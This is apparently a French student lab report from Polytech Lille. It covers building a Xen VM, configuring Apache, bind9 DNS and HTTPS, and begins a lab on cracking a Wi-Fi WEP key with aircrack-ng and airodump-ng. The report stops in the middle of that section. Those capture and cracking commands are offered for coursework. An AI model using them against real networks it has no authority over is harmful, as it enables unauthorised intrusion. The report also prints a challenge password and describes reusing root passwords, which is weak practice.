      tail -f /var/xen-tools/ima2a5-rex4ever.log&lt;br /&gt;
&lt;br /&gt;
=== Ajout du bridge à ima2a5-rex4ever.cfg ===&lt;br /&gt;
Dans un premier lieu, on regarde l'existence du brige sur l'hote distant via : &lt;br /&gt;
      brctl show&lt;br /&gt;
Ce qui nous retourne : &lt;br /&gt;
      bridge name	bridge id		STP enabled	interfaces&lt;br /&gt;
      IMA2a5		8000.000af75e3dc0	no		eth1&lt;br /&gt;
      eth2&lt;br /&gt;
      if3.0&lt;br /&gt;
      IMA5sc		8000.000af75e3dc2	no		eth3&lt;br /&gt;
      eth5&lt;br /&gt;
      Insecure		8000.c81f66c22b83	no		vlan6&lt;br /&gt;
      L3MRIT		8000.000af763ae2d	no		eth4&lt;br /&gt;
      StudentsInfo		8000.c81f66c22b83	no		vlan50&lt;br /&gt;
On voit bien l'existence du bridge '''IMA2a5''', il faut donc l'ajouter à notre .cfg qui est le fichier de configuration de la VM ('''/etc/xen/ima2a5-rex4ever.cfg''')&lt;br /&gt;
et on modifie la ligne commençant par '''vif =''' et on ajoute le bridge de la manière suivante : &lt;br /&gt;
      vif = ['MAC:xxxxx,bridge = IMA2a5']&lt;br /&gt;
Après avoir modifié ce fichier, il faut le parser : xl create /etc/xen/ima2a5-rex4ever.cfg&lt;br /&gt;
Une erreur '''NUMA placement failed, performance might be affected''' peut apparaître mais elle indique juste que xen n'arrive pas à disposer les VM comme il veut sur les procs, mais cela n'impactera que les performances nous passons outre ce problème.&lt;br /&gt;
&lt;br /&gt;
=== Démarrer la VM et accès console ===&lt;br /&gt;
On lance alors la commande pour accéder à la machine virtuelle: &lt;br /&gt;
      xl create /etc/xen/ima2a5-rex4ever.cfg&lt;br /&gt;
On lance alors la commande pour accéder à la machine virtuelle: &lt;br /&gt;
      xl console ima2a5-rex4ever&lt;br /&gt;
&lt;br /&gt;
il demande alors le login (root) et le mdp (longue chaine précédemment générée). Après nous être logué,on change le mot de passe qui devient le même que le mot de passe du root de '''corduan''' ou d'une zabeth.&lt;br /&gt;
&lt;br /&gt;
=== Montage des répertoires /var et /home ===&lt;br /&gt;
==== Creation des disques logique ====&lt;br /&gt;
Il faut d'abord créer les partitions logiques sur corduan via : &lt;br /&gt;
     lvcreate -L10G -n ima2a5-rex4ever-home virtual&lt;br /&gt;
     lvcreate -L10G -n ima2a5-rex4ever-var virtual&lt;br /&gt;
Il est possible qu'il affiche l'avertissement suivant : '''WARNING: ext2 signature detected on /dev/virtual/ima2a5-rex4ever-home at offset 1080. Wipe it? [y/n]'''&lt;br /&gt;
repondre alors oui(y).&lt;br /&gt;
Il est possible de verifier que votre partition a bien été crée via la commande :&lt;br /&gt;
      lvdisplay&lt;br /&gt;
On obtient alors dans la liste de toutes les partitions, nous deux partitions précedemment créées&lt;br /&gt;
      --- Logical volume ---&lt;br /&gt;
      LV Path                '''/dev/virtual/ima2a5-rex4ever-home'''&lt;br /&gt;
      LV Name                ima2a5-rex4ever-home&lt;br /&gt;
      VG Name                virtual&lt;br /&gt;
      LV UUID                mhJqFx-zO1m-PlOU-Zmeu-8NGx-7UUO-c2g9dP&lt;br /&gt;
      LV Write Access        read/write&lt;br /&gt;
      LV Creation host, time cordouan, 2019-11-08 08:47:26 +0000&lt;br /&gt;
      LV Status              available&lt;br /&gt;
      # open                 0&lt;br /&gt;
      LV Size                10.00 GiB&lt;br /&gt;
      Current LE             2560&lt;br /&gt;
      Segments               1&lt;br /&gt;
      Allocation             inherit&lt;br /&gt;
      Read ahead sectors     auto&lt;br /&gt;
      - currently set to     256&lt;br /&gt;
      Block device           254:3&lt;br /&gt;
     --- Logical volume ---&lt;br /&gt;
     LV Path                '''/dev/virtual/ima2a5-rex4ever-var'''&lt;br /&gt;
     LV Name                ima2a5-rex4ever-var&lt;br /&gt;
     VG Name                virtual&lt;br /&gt;
     LV UUID                9Bnl6S-6CE5-CtO2-hD8f-RidD-sps5-b1mrWg&lt;br /&gt;
     LV Write Access        read/write&lt;br /&gt;
     LV Creation host, time cordouan, 2019-11-08 08:50:57 +0000&lt;br /&gt;
     LV Status              available&lt;br /&gt;
     # open                 0&lt;br /&gt;
     LV Size                10.00 GiB&lt;br /&gt;
     Current LE             2560&lt;br /&gt;
     Segments               1&lt;br /&gt;
     Allocation             inherit&lt;br /&gt;
     Read ahead sectors     auto&lt;br /&gt;
     - currently set to     256&lt;br /&gt;
     Block device           254:4&lt;br /&gt;
Il faut maintenant faire pointer le système de fichier sur nos deux nouveaux repertoires pour finir la création : &lt;br /&gt;
     mke2fs /dev/virtual/ima2a5-rex4ever-home&lt;br /&gt;
     mke2fs /dev/virtual/ima2a5-rex4ever-var&lt;br /&gt;
Nos deux disques sont maintenant prêt, il ne reste plus qu'a les connecter avec la VM. Pour cela, il faut modifier le '''.cfg''' de nouveau.&lt;br /&gt;
&lt;br /&gt;
==== Modification du fichier de configuration ====&lt;br /&gt;
Retournons donc dans le fichier '''/etc/xen/ima2a5-rex4ever.cfg''' et dans la section disk modifier tel que : &lt;br /&gt;
&lt;br /&gt;
     disk    	= [&lt;br /&gt;
                   	'file:/usr/local/xen/domains/ima2a5-rex4ever/disk.img,xvda2,w',&lt;br /&gt;
                   	'file:/usr/local/xen/domains/ima2a5-rex4ever/swap.img,xvda1,w',               &lt;br /&gt;
                        'phy:/dev/virtual/ima2a5-rex4ever-home,xvdb1,w',&lt;br /&gt;
                        'phy:/dev/virtual/ima2a5-rex4ever-var,xvdb2,w',&lt;br /&gt;
                  ]&lt;br /&gt;
&lt;br /&gt;
Pour prendre effet il faut redémarrer la VM à l'aide des commandes&lt;br /&gt;
    xl shutdown ima2a5-rex4ever&lt;br /&gt;
    xl create /etc/xen/ima2a5-rex4ever.cfg&lt;br /&gt;
&lt;br /&gt;
==== Configuration pour forcer le montage à chaque démarrage de la VM ====&lt;br /&gt;
Il faut ensuite aller dans la VM dans '''/etc/fstab''' et ajouter &lt;br /&gt;
    /dev/xvdb1		/home		ext4		defaults				0		2&lt;br /&gt;
    #/dev/xvdb2		/var		ext4		defaults				0		2&lt;br /&gt;
&lt;br /&gt;
Ces deux lignes permettent d'assurer que les 2 disques /var et /home soient pris en compte au démarrage de la VM.('''ATTENTION POUR LE MOMENT BIEN LAISSER # DEVANT LA 2eme LIGNE''')&lt;br /&gt;
Relancer la machine comme précédemment expliqué et testé que le /home fonctionne.&lt;br /&gt;
Pour le /var c'est un peu plus compliqué comme manipulation et il faut faire EXTREMENT attention , une fausse manipulation peut tuer la machine.&lt;br /&gt;
    mount /dev/xvdb2 /mnt&lt;br /&gt;
    rm -rf /mnt/lock&lt;br /&gt;
    rm -rf /mnt/log&lt;br /&gt;
    rm -rf /mnt/run&lt;br /&gt;
    mv /var/* /mnt&lt;br /&gt;
    vi /etc/fstab&lt;br /&gt;
Maintenant decommentez la deuxième ligne que vous aviez ajouté précedemment. Puis il faut lancer la commande :&lt;br /&gt;
    umount /mnt    &lt;br /&gt;
    mount -a&lt;br /&gt;
A l'aide de la commande '''fdisk -l''' depuis la VM, on peut verifier que nos quatres disques sont bien montés.De même avec '''df''' on obtient bien dans la liste les lignes : &lt;br /&gt;
      Filesystem		1K-blocks	Used	Available	Use%	Mounted on&lt;br /&gt;
     udev		75004		0 	75004		0%	/dev&lt;br /&gt;
     tmpfs          	23824		76 	23748		1%	/run&lt;br /&gt;
     /dev/xvda2   	4062912		459920	3376896		12%	/&lt;br /&gt;
     tmpfs           	5120		0  	5120		0%	/run/lock&lt;br /&gt;
     tmpfs         	152500  	0	152500		0%	/run/shm&lt;br /&gt;
     /dev/xvdb1  	10321208	23028   9773892		1%	/home&lt;br /&gt;
     /dev/xvdb2  	10321208	71076   9725844		1%	/var&lt;br /&gt;
La machine est donc prête, on peut passer à l'installation des paquetages linux nécessaires&lt;br /&gt;
=== Mise en place de l'adresse statique ===&lt;br /&gt;
Précedemment nous avions mis l'adresse en DHCP or il est demandé d'avoir une adresse statique (pour notre groupe il s'agit de  ''' 193.48.57.163/28 ''' )&lt;br /&gt;
&lt;br /&gt;
=== Paquetage Linux ===&lt;br /&gt;
Pour commencer, on va tout d'abord mettre le système à jour via : &lt;br /&gt;
    sudo apt-get update&lt;br /&gt;
==== Paquetages nécessaires pour le SSH ====&lt;br /&gt;
'''OpenSSH''' est un ensemble d'outils libres pour établir des communications chiffrées, donc sécurisées, sur un réseau informatique grâce au protocole '''SSH''' (Secure SHell).&lt;br /&gt;
Il chiffre tout le trafic (mots de passe y compris), via une combinaison astucieuse de chiffrement symétrique et asymétrique. '''OpenSSH''' fournit également d'autres méthodes d'authentification alternatives au traditionnel mot de passe.&lt;br /&gt;
Comme son nom l'indique, OpenSSH est développé dans le cadre du projet '''OpenBSD'''.&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 85%;margin: auto;&amp;quot;&lt;br /&gt;
! Nom de la bibliothèque !! Descriptif !! Commande&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|OpenSSh Client&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Utilitaires de connexion SSH partie Client&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| sudo apt-get install openssh-client&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|OpenSSh Server&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Utilitaires de connexion SSH partie Server&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| sudo apt install openssh-server&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Dans notre cas, SSH est déjà présent sur la machine virtuelle.&lt;br /&gt;
&lt;br /&gt;
==== Paquetages nécessaires pour le serveur Web Apache2 ====&lt;br /&gt;
Le logiciel libre Apache HTTP Server (Apache) est un serveur HTTP créé et maintenu au sein de la fondation Apache. C'est le serveur HTTP le plus populaire du World Wide Web. Il est distribué selon les termes de la licence Apache. &lt;br /&gt;
Pour l'installer, il faut taper la commande : &lt;br /&gt;
    apt install apache2&lt;br /&gt;
&lt;br /&gt;
==== Paquetages nécessaires pour le serveur DNS bind ====&lt;br /&gt;
Le service DNS (Domain Name System) est un service TCP/IP permettant la correspondance entre un nom de domaine qualifié (FQDN : Fully Qualified Domain Name) et une adresse IP. Ainsi, grâce à DNS, il n'est pas nécessaire de se souvenir des adresses IP.Un serveur qui héberge le service DNS est appelé &amp;quot;serveur de noms&amp;quot;. Ubuntu est livré par défaut avec BIND (Berkley Internet Naming Daemon), le serveur DNS le plus utilisé sur Internet. Pour installer bind9 :&lt;br /&gt;
    apt install bind9&lt;br /&gt;
	&lt;br /&gt;
== Le Site Web : HTTP ==&lt;br /&gt;
=== Achat d'un nom de domaine ===&lt;br /&gt;
Pour la réalisation de ce TP, nous avons dû acheter un nom de domaine via le site [https://www.gandi.net/fr Gandi.net] . On retiendra que notre nom de domaine est : [https://www.ima2a5-rex4ever.site rex4ever.site].&lt;br /&gt;
&lt;br /&gt;
=== Paramétrage apache2 ===&lt;br /&gt;
Après avoir installé Apache2 sur la machine ( [https://wiki-ima.plil.fr/mediawiki//index.php/TP_sysres_IMA2a5_2019/2020_G3#Paquetages_n.C3.A9cessaires_pour_le_serveur_Web_Apache2 voir ici]), il faut le paramétrer correctement (je me suis servi de [https://doc.ubuntu-fr.org/apache2 ce site]).Pour cela, on commence configurer le '''.conf''' Pour cela, on le crée via la commande '''nano /etc/sites-available/ima2a5-rex4ever.site.conf''' et on renseigne alors dans le fichier les détails suivants :&lt;br /&gt;
    &amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
        ServerName ima2a5-rex4ever.site&lt;br /&gt;
        ServerAlias www.ima2a5-rex4ever.site&lt;br /&gt;
        DocumentRoot &amp;quot;/var/www/ima2a5-rex4ever&amp;quot;&lt;br /&gt;
        &amp;lt;Directory &amp;quot;/var/www/ima2a5-rex4ever&amp;quot;&amp;gt;&lt;br /&gt;
                Options +FollowSymLinks&lt;br /&gt;
                AllowOverride all&lt;br /&gt;
                Require all granted&lt;br /&gt;
        &amp;lt;/Directory&amp;gt;&lt;br /&gt;
        ErrorLog /var/log/apache2/error.ima2a5-rex4ever.site.log&lt;br /&gt;
        CustomLog /var/log/apache2/access.ima2a5-rex4ever.site.com.log combined&lt;br /&gt;
    &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
Maintenant qu'il est configuré, on peut déployer le site via : &lt;br /&gt;
    a2ensite ima2a5-rex4ever.site&lt;br /&gt;
Puis, on recharge la configuration de l'utilitaire Apache 2 :&lt;br /&gt;
    service apache2 reload&lt;br /&gt;
&lt;br /&gt;
=== Paramétrage du DNS ===&lt;br /&gt;
Le DNS (Domain Name Server) est un serveur qui permet de rattacher un nom à une IP et ainsi c'est lui qui permet de faire le lien entre le nom d'un site et son contenu&lt;br /&gt;
==== Glue Records sur Gandi ====&lt;br /&gt;
Le Glue Record permet de créer des alias et ainsi de lier des IP et à des noms.C'est fort pratique pour simplifier la configuration.Pour se faire il faut se rendre dans Domain , cliquer sur le nom de notre site , aller dans l'onglet Glue Records et cliquer sur ADD&lt;br /&gt;
   name : dns.ima2a5-rex4ever.site&lt;br /&gt;
   ip adresse(s) : 193.48.57.163&lt;br /&gt;
==== Affecter le DNS du coté de Gandi.net ====&lt;br /&gt;
Par défaut, les serveurs de noms (DNS) sont 3 serveurs de DNS Live Gandi, il faut ajouter les serveurs externes :&lt;br /&gt;
*ns6.gandi.net  '''217.70.177.40'''&lt;br /&gt;
*dns.ima2a5-rex4ever.site   '''193.48.57.163'''&lt;br /&gt;
'''Note:''' il faut compter 12 à 24 heures pour la propagation sur Internet.&lt;br /&gt;
==== Le paramétrage de bind9 ====&lt;br /&gt;
Le paramétrage repose sur la configuration de ses 3 fichiers :&lt;br /&gt;
===== Le fichier /etc/bind/named.conf.options =====&lt;br /&gt;
Ce fichier permet de gérer les DNS authorisés (de manière générale) à récuperer des informations de notre site. On le modifie pour permettre au dns de gandi de récuperer les données :&lt;br /&gt;
&lt;br /&gt;
     options {&lt;br /&gt;
     &lt;br /&gt;
         // forwarders {&lt;br /&gt;
         //     0.0.0.0;&lt;br /&gt;
         // };&lt;br /&gt;
         // dnssec-validation auto;&lt;br /&gt;
         auth-nxdomain no;    # conform to RFC1035&lt;br /&gt;
         listen-on-v6 { any; };&lt;br /&gt;
         '''allow-transfer { &amp;quot;allowed_to_transfer&amp;quot;; };'''&lt;br /&gt;
     };&lt;br /&gt;
     &lt;br /&gt;
     '''acl &amp;quot;allowed_to_transfer&amp;quot; {'''&lt;br /&gt;
        ''' 217.70.177.40/32; // adresse IP du dns6.gandi.net'''&lt;br /&gt;
     };&lt;br /&gt;
&lt;br /&gt;
===== Le fichier /etc/bind/named.conf.local =====&lt;br /&gt;
Il faut maintenant déclarer à Bind9 le nom de notre fichier de configuration de DNS sous forme de zone , on le fait via ce fichier. On lui renseigne la zone : &lt;br /&gt;
    &lt;br /&gt;
     zone &amp;quot;ima2a5-rex4ever.site&amp;quot; {&lt;br /&gt;
         type master;&lt;br /&gt;
         file &amp;quot;/etc/bind/db.ima2a5-rex4ever.site&amp;quot;;&lt;br /&gt;
     };&lt;br /&gt;
&lt;br /&gt;
===== le fichier /etc/bind/db.ima2a5-rex4ever.site=====&lt;br /&gt;
Enfin, il faut créer le fichier de configuration précedemment appelé : &lt;br /&gt;
&lt;br /&gt;
   ;&lt;br /&gt;
   ; BIND data file for local loopback interface&lt;br /&gt;
   ;&lt;br /&gt;
   $TTL    604800&lt;br /&gt;
   @       IN      SOA     dns.ima2a5-rex4ever.site. root@ima2a5-rex4ever.site. (  &amp;lt;= METTRE UNE ADRESSE BIDON , pas necessaire&lt;br /&gt;
                           21112019        ; Serial&lt;br /&gt;
                            604800         ; Refresh&lt;br /&gt;
                             86400         ; Retry&lt;br /&gt;
                           2419200         ; Expire&lt;br /&gt;
                            604800 )       ; Negative Cache TTL&lt;br /&gt;
   ;&lt;br /&gt;
   @       IN      NS      dns.ima2a5-rex4ever.site.  &amp;lt;= DN du site &lt;br /&gt;
   @       IN      NS      ns6.gandi.net.&amp;lt;= DNS de gandi&lt;br /&gt;
   dns     IN      A       193.48.57.163 &amp;lt;= IP DE NOTRE DNS&lt;br /&gt;
   www     IN      A       193.48.57.163 &amp;lt;= IP DE NOTRE SITE&lt;br /&gt;
&lt;br /&gt;
Après 5 minutes de cuisson et avoir relancé bind9, c'est prêt le site en http est accessible et visualisable! On peut acceder au site internet http://www.ima2a5-rex4ever.site !&lt;br /&gt;
&lt;br /&gt;
== Le Site Web : HTTPS ==&lt;br /&gt;
Le SSL (Secure Socket Layer) / TLS (Transport Layer Security) est le protocole de sécurité le plus répandu qui créé un canal sécurisé entre deux machines communiquant sur Internet ou un réseau interne. Dans notre société centrée sur un Internet vulnérable, le SSL est généralement utilisé lorsqu'un navigateur doit se connecter de manière sécurisée à un serveur web.&lt;br /&gt;
&lt;br /&gt;
=== Generation d'un certificat ===&lt;br /&gt;
&lt;br /&gt;
La première étape pour générer un certificat est de concevoir un jeu de 2 clefs qui sont un '''.key''' et un '''.csr''' &lt;br /&gt;
Pour obtenir ces deux fichiers, nous utilisons l'utilitaire '''OpenSSL'''.&lt;br /&gt;
      openssl req -nodes -newkey rsa:2048 -sha256 -keyout ima2a5-rex4ever.key -out ima2a5-rex4ever.csr &lt;br /&gt;
&lt;br /&gt;
'''Mais alors comment marche cette commande?'''&lt;br /&gt;
Après avoir lu le descriptif que l'on peut obtenir via [http://www.delafond.org/traducmanfr/man/man1/openssl.1.html man openssl], il en ressort que les arguments sont :&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 85%;margin: auto;&amp;quot;&lt;br /&gt;
! Argument !! explication&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|req&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;| Gestion X.509 Certificate Signing Request (CSR). &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-nodes&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;| Pas de chiffrage sur la clef privée (option arbitraire no des)&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-newkey rsa:2048&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|demande de Génération d'une paire de clef RSA de 2048 bits et d'une demande de certificat.&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-keyout ima2a5-rex4ever.key&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|spécification du nom de notre .key&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-out ima2a5-rex4ever.csr &lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|spécification du nom de notre demande de certificat .csr&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
Pour générer en bon éduforme notre demande,l'utilitaire a besoin des informations, voici ce que nous avons répondu:&lt;br /&gt;
&lt;br /&gt;
      Country Name (2 letter code) [AU]:'''FR'''&lt;br /&gt;
      State or Province Name (full name) [Some-State]:'''Nord'''&lt;br /&gt;
      Locality Name (eg, city) []:'''Lille'''&lt;br /&gt;
      Organization Name (eg, company) [Internet Widgits Pty Ltd]:'''Polytech Lille'''&lt;br /&gt;
      Organizational Unit Name (eg, section) []:'''IMA2A5'''&lt;br /&gt;
      Common Name (e.g. server FQDN or YOUR name) []:'''ima2a5-rex4ever.site'''&lt;br /&gt;
      Email Address []:'''pascal.coint@polytech-lille.net'''&lt;br /&gt;
      &lt;br /&gt;
      Please enter the following 'extra' attributes&lt;br /&gt;
      to be sent with your certificate request&lt;br /&gt;
      A challenge password []:'''glopglop!'''&lt;br /&gt;
      Optionnal informations :&lt;br /&gt;
&lt;br /&gt;
==== Affectation du certificat sur Gandi.net ====&lt;br /&gt;
Après avoir répondu , il génère alors 2 fichiers. Le '''.key''' est notre clef privée elle restera donc en notre unique possession. On partage avec gandhi (qui est également un générateur de certificat) notre '''.csr'''. Il va donc étudier la validité de notre domaine et le certifier ou non.&lt;br /&gt;
&lt;br /&gt;
''' Contenu de notre CSR'''&lt;br /&gt;
      -----BEGIN CERTIFICATE REQUEST-----&lt;br /&gt;
      MIIDBTCCAe0CAQAwgaUxCzAJBgNVBAYTAkZSMQ0wCwYDVQQIDAROb3JkMQ4wDAYD&lt;br /&gt;
      VQQHDAVMaWxsZTEXMBUGA1UECgwOUG9seXRlY2ggTGlsbGUxDzANBgNVBAsMBklN&lt;br /&gt;
      QTJBNTEdMBsGA1UEAwwUaW1hMmE1LXJleDRldmVyLnNpdGUxLjAsBgkqhkiG9w0B&lt;br /&gt;
      CQEWH3Bhc2NhbC5jb2ludEBwb2x5dGVjaC1saWxsZS5uZXQwggEiMA0GCSqGSIb3 &lt;br /&gt;
      DQEBAQUAA4IBDwAwggEKAoIBAQDBKS9p8572UiXo2W1dAiKEKLq+B6ge/si0AhMH&lt;br /&gt;
      fLtovMz7Xvy/9oQnq25SvkWaNRuAJrvzROGS2mzkG9IEhnEpWSTNvspTO60PgNPo&lt;br /&gt;
      EUYcgKAeEuVVJyom3K3ioBOvllucQfiOIB/ykvP80s+9Wjo2vf2PkESPTjfM0zKP&lt;br /&gt;
      2JMT9cGQV6auD7NU+Ygz7w5dW/NKkU2KZA9HQ7i95+/ST3r2T0D8xP/ltEBC0Q7i&lt;br /&gt;
      U/OVkAKn6CPJ6KtkbQYvgKVG95IM5SQb/WxRVNnHKS4f+erNFYpx5iNiHhv6larV&lt;br /&gt;
      G0oR9uNsg7tOhdhcVVnooGSAsoxtgmDLwzuuho+3fS4t1K83AgMBAAGgGjAYBgkq&lt;br /&gt;
      hkiG9w0BCQcxCwwJZ2xvcGdsb3AhMA0GCSqGSIb3DQEBCwUAA4IBAQB7jtWizvBQ&lt;br /&gt;
      dNEyyVRhS563mKFo34RWW4g5tpnPC6wepQ7tvHo6gZZtzljobsWF55lRK7/Pi8eh&lt;br /&gt;
      ANyQxb1Lo9FcHJcUOEMc8heeutSZQoCslTdRNMe+uBhQ/qCLXjy+fgdptqPi9cXP&lt;br /&gt;
      zi8gBbrAQ9sHqJPK/RwhzuhCkBSzYgoNbYLjrHf8lCe60+7+0HBKM3jpTUDmzrzg&lt;br /&gt;
      Kmb8GmkgcrzKSNhlOFZpiQqBJUfK5zJEucdhJ0j7Tupwf+J2oO+TccnCNH7o1Ykc&lt;br /&gt;
      7ANKYKpf8AoCcZenLutCXt3YGjT8INuh5SnpsyR3BZUK9hNzZGK9Ilv9hwiEnmaS&lt;br /&gt;
      PQWRkLUGQdh+&lt;br /&gt;
      -----END CERTIFICATE REQUEST-----&lt;br /&gt;
&lt;br /&gt;
Puis, Gandi.net va demander une méthode de vérification sur le serveur web cible afin de savoir s'il s'agit bien de notre serveur.Il existe trois possibilités:&lt;br /&gt;
*Par verification DNS&lt;br /&gt;
*Par Mail&lt;br /&gt;
*Par fichier&lt;br /&gt;
Nous avons choisi la méthode par fichier, certes un peu longue mais ne nécessitant pas l'intervention de Monsieur Redon.&lt;br /&gt;
On copie ainsi un fichier temporaire à l'endroit indiqué par gandi et on attend que gandi valide la demande.&lt;br /&gt;
Après une verification de la part de Gandi (qui nécessite plusieurs dizaines de minutes), on obtient un certificat ('''.csr''') et le certificat intermédiaire ('''.pem''')&lt;br /&gt;
Ils sont nécessaires pour la configuration du site en HTTPS.&lt;br /&gt;
&lt;br /&gt;
=== S'assurer qu'Apache écoute le port 443 (protocole https) ===&lt;br /&gt;
On sait que le protocole HTTPS se sert du port 443 pour communiquer , verifions alors que c'est bien le cas : &lt;br /&gt;
    root@ima2a5-rex4ever:/etc/apache2# netstat -tanpu |grep &amp;quot;LISTEN&amp;quot; |grep &amp;quot;443&amp;quot;&lt;br /&gt;
    tcp6       0      0 :::443                  :::*                    LISTEN      10706/apache2&lt;br /&gt;
Le résultat indique en effet que le port 443 est ecouté par apache2, ce qui signifie qu'il ne faut pas faire de configuration supplémentaire.&lt;br /&gt;
&lt;br /&gt;
=== Activation du protocole SSL ===&lt;br /&gt;
Il faut activer le module qui gère le protocole SSL via la commande : &lt;br /&gt;
   a2enmode ssl&lt;br /&gt;
   service apache2 restart&lt;br /&gt;
&lt;br /&gt;
=== Configuration du VirtualHost Apache pour le protocole HTTPS ===&lt;br /&gt;
Afin de ne pas saboter la configuration HTTP déjà en place, on va dupliquer la configuration disponible dans /sites-available:&lt;br /&gt;
    cp ima2a5-rex4ever.site.conf ima2a5-rex4ever.site-ssl.conf&lt;br /&gt;
Modification :&lt;br /&gt;
   &amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
  #   General setup for the virtual host&lt;br /&gt;
     DocumentRoot &amp;quot;/var/www/ima2a5-rex4ever&amp;quot;&lt;br /&gt;
     ServerName ima2a5-rex4ever.site:443                                                                                                                                                                                                          ServerAdmin pascal.coint@polytech-lille.net                                                                                                                                                                                                  ErrorLog &amp;quot;/usr/local/apache2/logs/error_log&amp;quot;                                                                                                                                                                                                 TransferLog &amp;quot;/usr/local/apache2/logs/access_log&amp;quot;                                                                                                                                                                                          # Activation du SSL                                                                                                                                                                                                                                SSLEngine On&lt;br /&gt;
    &lt;br /&gt;
    # Activation de tous les protocoles sécurisés (TLS v1.0, v1.1 et TLS v1.2) touut en désactivant les protocoles non sécurisés (SSL v2, SSL v3)&lt;br /&gt;
    SSLProtocol All -SSLv3 -SSLv2&lt;br /&gt;
    # Le navigateur devra choisir une méthode de chiffrement en respectant l'ordre indiquée dans SSLCipherSuite&lt;br /&gt;
    SSLHonorCipherOrder on&lt;br /&gt;
    &lt;br /&gt;
    # Chemin vers le certificat SSL de votre nom de domaine&lt;br /&gt;
    SSLCertificateFile &amp;quot;/etc/apache2/certificate/ima2a5-rex4ever.cer&amp;quot;&lt;br /&gt;
    SSLCACertificateFile &amp;quot;/etc/apache2/certificate/ima2a5-rex4ever.pem&amp;quot;&lt;br /&gt;
    # Chemin vers la clée privée du certificat SSL de votre nom de domaine&lt;br /&gt;
    SSLCertificateKeyFile &amp;quot;/etc/apache2/certificate/ima2a5-rex4ever.key&amp;quot;    &lt;br /&gt;
    &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
On peut maintenant permuter les fichiers .conf et renommer notre ancien .conf en &amp;quot;ima2a5-rex4ever.site-http.conf&amp;quot;&lt;br /&gt;
'''Note :''' Comme vous aurez pu le remarquer, j'ai créer un dossier certificate dans lequel j'ai mis le .cer,le .csr,le.key et le .pem afin de ne pas les perdre.&lt;br /&gt;
On va ensuite décharger puis recharger le site :&lt;br /&gt;
   a2dissite ima2a5-rex4ever.site&lt;br /&gt;
   a2ensite ima2a5-rex4ever.site&lt;br /&gt;
   service apache2 restart&lt;br /&gt;
&lt;br /&gt;
Ensuite on va regarder quels sont nos sites actifs à l'aide de apache2ctl -S , ce qui retourne :&lt;br /&gt;
    *:80                   ima2a5-rex4ever.site (/etc/apache2/sites-enabled/000-default.conf:1)&lt;br /&gt;
    *:443                  ima2a5-rex4ever.site (/etc/apache2/sites-enabled/ima2a5-rex4ever.site.conf:13)&lt;br /&gt;
Le site est prêt pour le HTTPS&lt;br /&gt;
&lt;br /&gt;
=== Securisation du DNS : Le DNSSEC ===&lt;br /&gt;
Avoir un site sécurisé c'est bien , avoir toute la chaine de transmission pour éviter les fraude c'est encore mieux. Pour cela, il est possible de concevoir un DNSSEC (contraction de DNS SECURISED)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Attaque d'une installation Wi-fi ==&lt;br /&gt;
=== Description ===&lt;br /&gt;
Notre Client Wi-fi est un ordinateur portable fourni par Monsieur Redon. Il ne nécessite pas nécessairement de configuration. Cependant, la clef Wi-Fi fournie avec elle doit être paramétrée (la datasheet peut se trouver à l'adresse suivant ; [https://www.farnell.com/datasheets/1669935.pdf Datasheet]). De plus, il faut installer les paquetages nécessaire pour craquer la clef Wep et la clef WPA&lt;br /&gt;
&lt;br /&gt;
=== Installation du paquetage AirCrack-ng ===&lt;br /&gt;
Pour installer [https://doc.ubuntu-fr.org/aircrack-ng AirCrack] (utilitaire qui permet de casser les clefs WEP et WPA), il suffit de taper la commande :&lt;br /&gt;
    apt-get install aircrack-ng&lt;br /&gt;
'''Note:''' il faut auparavant configurer le réseau pour se connecter à internet.&lt;br /&gt;
&lt;br /&gt;
=== Utilisation de AirCrack pour clef WEP ===&lt;br /&gt;
Après avoir branché la clef WiFi, on se sert de '''airmon-ng''' qui est un utilitaire qui espionne le réseau et permet d'obtenir les types d'interfaces communicantes/espionnable.&lt;br /&gt;
   airmon-ng&lt;br /&gt;
Pour tenter de s'y connecter en tant qu'espion, il faut alors taper (nous le tapons ici avec wlan0mon):&lt;br /&gt;
   airmong-ng start NOMRESEAUESPIONNABLE&lt;br /&gt;
Puis, pour observer et découvrir les canaux associés au réseau et leurs SSID,il faut taper:&lt;br /&gt;
   airodump-ng --encrypt wep NOMRESEAUESPIONNABLE&lt;br /&gt;
Puis à l'aide d'un second terminal, on peut stocker les informations volées dans un .txt :&lt;br /&gt;
   Airodump-ng FICHIER.txt -c 2 --bssid ADDRESSBSSID NOMRESEAUESPIONNABLE&lt;br /&gt;
Ce qui donne dans notre cas : &lt;br /&gt;
   airmon-ng&lt;br /&gt;
   airmong-ng start wlan0mon&lt;br /&gt;
